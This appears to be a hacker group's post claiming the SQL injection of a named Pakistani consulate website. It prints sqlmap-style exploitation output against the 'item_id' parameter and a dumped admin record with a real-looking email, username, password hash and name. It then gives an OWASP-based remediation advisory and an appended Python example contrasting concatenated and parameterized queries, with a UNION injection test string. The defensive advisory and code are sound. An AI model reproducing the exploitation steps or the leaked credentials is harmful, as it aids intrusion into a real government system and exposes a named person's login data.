Pakistan Embassy Jeddah – SQL vuln (Exploited)


Hacked Website : http://www.pakconsulatejeddah.gov.pk/

Vuln : SQL Injection

Level : 6/10

Authorities Notified : Yes (NATIONAL RESPONSE CENTRE FOR CYBER CRIME)
Date : 27 Nov 2015
Method : Email Advisory
Proof Of Code / Hackers Information (Provided Below) :

Operation planned by: Mr.Instinct
Main Contributors: Xtam4, Axid Burn and Balalaika.

Main Target: http://www.pakconsulatejeddah.gov.pk/index.php

[*] starting at 15:13:28

[15:30:01] [INFO] GET parameter ‘item_id’ is ‘MySQL UNION query (NULL) – 1 to 20 columns’ injectable
GET parameter ‘item_id’ is vulnerable.

back-end DBMS: MySQL 5.0.11
[15:32:31] [INFO] fetching database names
[15:32:47] [INFO] the SQL query used returns 3 entries
[15:32:49] [INFO] retrieved: “information_schema”
[15:32:50] [INFO] retrieved: “pakcons_consulate”
[15:32:58] [INFO] retrieved: “pakcons_tns”
available databases [3]:
[*] information_schema
[*] pakcons_consulate
[*] pakcons_tns
Database: pakcons_consulate
Table: admin
[1 entry]
+—-+———————-+————-+———————————-+————–+
| id | email | username | password | full_name |
+—-+———————-+————-+———————————-+————–+
| 1 | [email protected] | pakadmincon | 1c6770d0e097b9a1dc3b76767991ba85 | M. Amir Khan |
+—-+———————-+————-+———————————-+————–+

Advisory :

Please escape the user-supplied input parameter 'item_id'.

Primary Defenses:

Option #1: Use of Prepared Statements (Parameterized Queries)
Option #2: Use of Stored Procedures
Option #3: Escaping all User Supplied Input

Additional Defenses:

Also Enforce: Least Privilege
Also Perform: White List Input Validation

For more info please visit : https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
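
Added example (not part of the original advisory or the site's code): Option #1 and white-list validation applied to an item_id request parameter, with the concatenated "before" beside the parameterized "after". It uses Python's sqlite3 and a constructed in-memory database as a stand-in for the site's MySQL back end; the table contents, function names and test input are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the site's database (no real data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items (item_id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO items VALUES (1, 'Visa information'), (2, 'Consular services');
        INSERT INTO admin VALUES (1, 'sample_admin', 'sample_hash');
    """)
    return db

def get_item_vulnerable(db, item_id):
    # "Before": the request value is concatenated into the SQL text, so the
    # database parses it as SQL. This is the pattern the scanner log flags.
    query = "SELECT item_id, title FROM items WHERE item_id = " + item_id
    return db.execute(query).fetchall()

def validate_item_id(raw):
    # White-list validation: item_id must be a short run of ASCII digits.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("item_id must be a positive integer")
    return int(raw)

def get_item_safe(db, item_id):
    # "After": validate first, then bind the value as a parameter. The driver
    # passes it as data; it never becomes part of the SQL statement.
    value = validate_item_id(item_id)
    return db.execute(
        "SELECT item_id, title FROM items WHERE item_id = ?", (value,)
    ).fetchall()

# Constructed test input of the UNION class named in the log above.
UNION_INPUT = "0 UNION SELECT username, password FROM admin"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_item_vulnerable(db, UNION_INPUT))
    try:
        get_item_safe(db, UNION_INPUT)
    except ValueError as err:
        print("safe: rejected:", err)
    print("safe:", get_item_safe(db, "1"))
```

Binding alone already stops the value from being parsed as SQL; the validation step additionally rejects malformed requests before they reach the database, which makes them easy to log and alert on.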

For further advisories and information, please feel free to contact us at [email protected].


Tier3 Cyber Security Solutions
Islamabad
Pakistan
www.tier3.xyz
#opsec Pakistan
